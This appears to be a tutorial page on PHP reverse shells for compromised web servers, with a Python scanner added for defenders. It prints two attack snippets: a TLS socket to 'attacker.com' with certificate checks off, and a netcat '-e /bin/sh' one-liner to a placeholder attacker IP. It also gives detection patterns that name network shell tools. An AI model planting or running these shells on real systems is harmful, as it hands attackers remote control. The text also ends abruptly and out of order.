When you gain access to a web server—whether through a file upload vulnerability, a misconfigured content management system (CMS), or a Local File Inclusion (LFI) exploit—the next logical step is establishing a stable foothold. On Linux/Unix-based web servers, PHP remains the undisputed king for deploying quick, effective reverse shells.
Why? Because PHP runs on the server side and has built-in functions to execute system commands. If the web server (like Apache or Nginx) has permissions to make outbound connections, a PHP reverse shell is often the path of least resistance.
Here is a breakdown of the top techniques for executing PHP reverse shells, from the basics to bypassing defenses.
| Function | Purpose |
|----------|---------|
| fsockopen() | Open TCP socket connection to attacker |
| pfsockopen() | Persistent version of fsockopen |
| socket_create() | Low-level socket creation |
| exec(), system() | Execute OS commands |
| proc_open() | Advanced process control (with pipes) |
| die() or exit() | Terminate script if connection fails |
| fwrite() / fread() | Read/write over socket |
| shell_exec() | Return command output as string |
Detect common patterns:
Using stream_socket_client() with SSL:

```php
$context = stream_context_create(['ssl' => ['verify_peer' => false]]);
$sock = stream_socket_client('ssl://attacker.com:443', $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context);
```
Sometimes, for simplicity and evasion, a one-liner is used:

```php
<?php exec("nc your_attacker_ip_address 4444 -e /bin/sh"); ?>
```
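For defenders, the function table and the two snippets above translate into a triage check for files under a webroot. The Python scanner below is an added example, not code from the original page; the finding labels, sample names and regexes are assumptions chosen here, and it is a heuristic that obfuscated code will evade.

```python
import re

# Function names come from the table and snippets on this page.
NET_FUNCS = ("fsockopen", "pfsockopen", "socket_create", "stream_socket_client")
EXEC_FUNCS = ("exec", "system", "shell_exec", "proc_open")

def _call_re(names):
    # The lookbehind rejects longer names (curl_exec), methods ($db->exec),
    # static calls (Foo::exec) and variables ($exec).
    return re.compile(r"(?<![\w>$:])(?:" + "|".join(names) + r")\s*\(", re.I)

NET_RE = _call_re(NET_FUNCS)
EXEC_RE = _call_re(EXEC_FUNCS)
NO_VERIFY_RE = re.compile(r"""['"]verify_peer['"]\s*=>\s*false""", re.I)
NC_EXEC_RE = re.compile(r"\b(?:nc|ncat|netcat)\b[^;\n]*\s-e\s", re.I)

def scan_php(source):
    """Return sorted finding labels for one PHP source string (triage heuristic)."""
    has_net = bool(NET_RE.search(source))
    has_exec = bool(EXEC_RE.search(source))
    findings = set()
    if has_net and has_exec:
        findings.add("socket+exec")      # outbound socket alongside command execution
    if has_net and NO_VERIFY_RE.search(source):
        findings.add("tls-no-verify")    # client socket with certificate checks off
    if has_exec and NC_EXEC_RE.search(source):
        findings.add("netcat-exec")      # netcat launched with -e from PHP
    return sorted(findings)

# Samples: the first two are the snippets shown on this page, the rest are constructed.
SAMPLES = {
    "page_tls.php": """$context = stream_context_create(['ssl' => ['verify_peer' => false]]);
$sock = stream_socket_client('ssl://attacker.com:443', $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context);""",
    "page_oneliner.php": '<?php exec("nc your_attacker_ip_address 4444 -e /bin/sh"); ?>',
    "constructed_shell_shape.php": "<?php $s = pfsockopen($h, $p); proc_open($cmd, $spec, $pipes); ?>",
    "constructed_benign.php": "<?php $r = $db->exec($sql); $o = curl_exec($ch); ?>",
}

def scan_all(samples=SAMPLES):
    """Scan every sample and map its name to the list of findings."""
    return {name: scan_php(src) for name, src in samples.items()}

if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(f"{name}: {hits or 'clean'}")
```

The benign sample shows why the call regex needs the lookbehind: `$db->exec()` and `curl_exec()` are routine in application code and would otherwise bury real findings.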
Before diving into the "top" scripts, it’s crucial to understand the network dynamics.